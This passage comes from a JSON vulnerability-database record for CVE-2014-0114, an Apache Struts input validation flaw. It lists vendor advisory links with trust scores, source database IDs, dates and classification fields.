"https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04473828" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61061" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680848" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676646" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042186" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042185" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042184" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61039" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61058" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037507" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678830" }, { "trust": 0.9, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-020/index.html" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037825" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037409" }, { "trust": 0.9, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037506" }, { "trust": 0.9, "url": "https://rhn.redhat.com/errata/rhsa-2014-0500.html" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004807" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673757" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673508" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673695" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674099" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674104" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673992" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674110" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673982" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673422" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678359" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680716" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21675387" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677802" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674310" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674191" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674017" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674016" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674339" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677449" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675496" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676485" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677298" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674613" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676091" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673878" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673877" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674113" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674905" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679331" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680698" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037424" }, { "trust": 0.9, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15282.html" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680194" }, { "trust": 0.9, "url": "http://jvn.jp/en/jp/jvn30962312/index.html" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677352" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037622" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86@%3cdev.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f@%3cnotifications.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3csolr-user.lucene.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3@%3cnotifications.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3ccommits.pulsar.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd@%3ccommits.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55@%3csolr-user.lucene.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5@%3ccommits.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30@%3cissues.activemq.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3cdev.drill.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3cdev.drill.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e@%3cissues.activemq.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40@%3cgitbox.activemq.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1@%3cdev.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477@%3ccommits.dolphinscheduler.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639@%3ccommits.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3cdevnull.infra.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3cissues.drill.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b@%3cannounce.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25@%3cdev.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c@%3cissues.activemq.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f@%3cuser.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3csolr-user.lucene.apache.org%3e" }, { "trust": 0.6, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674379www-01.ibm.com/support/docview.wss?uid=swg21677335" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3ccommits.druid.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859@%3cdev.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8@%3cissues.commons.apache.org%3e" }, { "trust": 0.6, "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10795183" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10872142" }, { "trust": 0.6, "url": "https://issues.apache.org/jira/browse/beanutils-520" }, { "trust": 0.6, "url": "https://www.mail-archive.com/announce@apache.org/msg05413.html" }, { "trust": 0.6, "url": "https://www.ibm.com/support/docview.wss?uid=ibm10887121" }, { "trust": 0.6, "url": "https://www.ibm.com/support/docview.wss?uid=ibm10957873" }, { "trust": 0.6, "url": "https://www.ibm.com/support/docview.wss?uid=ibm10887119" }, { "trust": 0.6, "url": "https://www.ibm.com/support/docview.wss?uid=ibm10887113" }, { "trust": 0.6, "url": "https://www.ibm.com/support/docview.wss?uid=ibm10888007" }, { "trust": 0.6, "url": "https://www.ibm.com/support/docview.wss?uid=ibm10887999" }, { "trust": 0.6, "url": "https://www.ibm.com/support/docview.wss?uid=ibm10887973" }, { "trust": 0.6, "url": "https://www.ibm.com/support/docview.wss?uid=ibm10888009" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/75922" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-3/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-2/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2568/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.1427/" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6494701" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-warehouse-has-released-a-fix-in-response-to-multiple-vulnerabilities-found-in-ibm-db2/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2355/" }, { "trust": 0.6, "url": "https://us-cert.cisa.gov/ics/advisories/icsma-20-184-01" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-identified-in-ibm-storediq/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-db2-that-affect-the-ibm-performance-management-product/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-db2-and-ibm-java-runtime-affect-ibm-spectrum-protect-server/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-open-source-used-in-ibm-cloud-pak-system/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.2293.2/" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10879093" }, { "trust": 0.6, "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10872142" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/78218" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.3134/" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022072128" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-planning-analytics-workspace-is-affected-by-security-vulnerabilities-3/" }, { "trust": 0.3, "url": "http://struts.apache.org/" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674379" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg21677335" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-0114" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-1000129" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1271" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000342" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000352" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000346" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-1114" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5397" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14063" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1000343" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-1338" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2017-14063" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000130" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1000342" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1000352" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1114" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1272" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1000346" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000339" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1000340" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1000341" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000341" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.1/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-8088" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000343" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8036" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000344" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1000345" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1000338" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-1272" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.fuse\u0026downloadtype=distributions\u0026version=7.1.0" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000340" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000129" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-1339" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000180" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1339" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000338" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/2939351" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1000339" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-1271" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-1000130" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-8036" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-1000180" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8088" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5397" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1338" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1000344" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000345" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=fuse.esb.enterprise\u0026downloadtype=securitypatches\u0026version=7.1.0" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0114.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0114" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://www.openwall.com/ove/" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00321" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00320" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00322" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00324" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00318" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00319" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00316" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00315" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00323" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00317" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0114" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://issues.jboss.org/):" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.broker\u0026version=7.5.0" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/" }, { "trust": 0.1, "url": "https://softwaresupport.hpe.com\u003e." }, { "trust": 0.1, "url": "https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0763" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3253" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6429" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0050" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5652" }, { "trust": 0.1, "url": "http://twitter.com/rgielen" }, { "trust": 0.1, "url": "http://struts.apache.org/struts1eol-announcement.html" }, { "trust": 0.1, "url": "http://h30499.www3.hp.com/t5/hp-security-research-blog/protect-your-struts1-applications/ba-p/6463188#.u2j7xeasxro" } ], "sources": [ { "db": "BID", "id": "67121" }, { "db": "PACKETSTORM", "id": "149311" }, { "db": "PACKETSTORM", "id": "126619" }, { "db": "PACKETSTORM", "id": "126692" }, { "db": "PACKETSTORM", "id": "149050" }, { "db": "PACKETSTORM", "id": "127868" }, { "db": "PACKETSTORM", "id": "137980" }, { "db": "PACKETSTORM", "id": "154792" }, { "db": "PACKETSTORM", "id": "128873" }, { "db": "PACKETSTORM", "id": "139721" }, { "db": "PACKETSTORM", "id": "126455" }, { "db": "CNNVD", "id": "CNNVD-201404-581" }, { "db": "NVD", "id": "CVE-2014-0114" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-0114" }, { "db": "BID", "id": "67121" }, { "db": "PACKETSTORM", "id": "149311" }, { "db": "PACKETSTORM", "id": "126619" }, { "db": "PACKETSTORM", "id": "126692" }, { "db": "PACKETSTORM", "id": "149050" }, { "db": "PACKETSTORM", "id": "127868" }, { "db": "PACKETSTORM", "id": "137980" }, { "db": "PACKETSTORM", "id": "154792" }, { "db": "PACKETSTORM", "id": "128873" }, { "db": "PACKETSTORM", "id": "139721" }, { "db": "PACKETSTORM", "id": "126455" }, { "db": "CNNVD", "id": "CNNVD-201404-581" }, { "db": "NVD", "id": "CVE-2014-0114" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-30T00:00:00", "db": "VULMON", "id": "CVE-2014-0114" }, { "date": "2014-04-29T00:00:00", "db": "BID", "id": "67121" }, { "date": "2018-09-11T15:41:48", "db": "PACKETSTORM", "id": "149311" }, { "date": "2014-05-14T19:25:00", "db": "PACKETSTORM", "id": "126619" }, { "date": "2014-05-19T03:19:48", "db": "PACKETSTORM", "id": "126692" }, { "date": "2018-08-23T17:19:18", "db": "PACKETSTORM", "id": "149050" }, { "date": "2014-08-14T22:49:43", "db": "PACKETSTORM", "id": "127868" }, { "date": "2016-07-20T18:29:00", "db": "PACKETSTORM", "id": "137980" }, { "date": "2019-10-10T14:43:55", "db": "PACKETSTORM", "id": "154792" }, { "date": "2014-10-28T18:09:30", "db": "PACKETSTORM", "id": "128873" }, { "date": "2016-11-15T00:42:48", "db": "PACKETSTORM", "id": "139721" }, { "date": "2014-05-03T02:09:52", "db": "PACKETSTORM", "id": "126455" }, { "date": "2014-04-30T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-581" }, { "date": "2014-04-30T10:49:03.973000", "db": "NVD", "id": "CVE-2014-0114" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-02-13T00:00:00", "db": "VULMON", "id": "CVE-2014-0114" }, { "date": "2019-07-17T07:00:00", "db": "BID", "id": "67121" }, { "date": "2023-04-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-581" }, { "date": "2024-11-21T02:01:23.960000", "db": "NVD", "id": "CVE-2014-0114" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "126619" }, { "db": "PACKETSTORM", "id": "126692" }, { "db": "PACKETSTORM", "id": "149050" }, { "db": "PACKETSTORM", "id": "137980" }, { "db": "CNNVD", "id": "CNNVD-201404-581" } ], "trust": 1.0 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Apache Struts Input validation error vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-581" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-581" } ], "trust": 0.6 } }
var-201504-0247
Vulnerability from variot
